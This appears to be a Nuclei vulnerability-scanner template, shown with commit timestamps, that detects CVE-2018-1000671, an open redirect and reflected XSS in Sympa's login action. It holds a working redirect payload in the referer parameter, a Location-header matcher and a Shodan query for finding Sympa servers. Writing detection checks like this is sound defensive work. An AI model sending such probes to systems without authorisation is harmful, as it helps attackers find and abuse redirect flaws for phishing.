2022-07-19 12:44:46 +00:00
id : CVE-2018-1000671
info :
name : Sympa version 6.2.16 - Open redirect and XSS
author : 0x_Akoko
severity : medium
2022-07-20 22:51:08 +00:00
description : sympa version 6.2.16 and later contains a URL Redirection to Untrusted Site vulnerability in The referer parameter of the wwsympa fcgi login action that can result in Open redirection and reflected XSS via data URIs
2022-07-19 12:44:46 +00:00
reference :
- https://github.com/sympa-community/sympa/issues/268
- https://www.cvedetails.com/cve/CVE-2018-1000671
- https://vuldb.com/?id.123670
classification :
2022-07-24 17:19:23 +00:00
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
2022-07-19 12:44:46 +00:00
cve-id : CVE-2018-1000671
cwe-id : CWE-601
2022-07-24 17:04:32 +00:00
metadata :
shodan-query : http.html:"sympa"
2022-07-24 17:19:23 +00:00
verified : "true"
2022-07-24 17:04:32 +00:00
tags : cve,cve2018,redirect,sympa,debian
2022-07-19 12:44:46 +00:00
requests :
- method : GET
path :
2022-07-24 17:04:32 +00:00
- '{{BaseURL}}/sympa?referer=http://interact.sh&passwd=&previous_action=&action=login&action_login=&previous_list=&list=&email='
2022-07-19 12:44:46 +00:00
matchers :
- type : regex
part : header
2022-07-24 17:04:32 +00:00
regex :
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1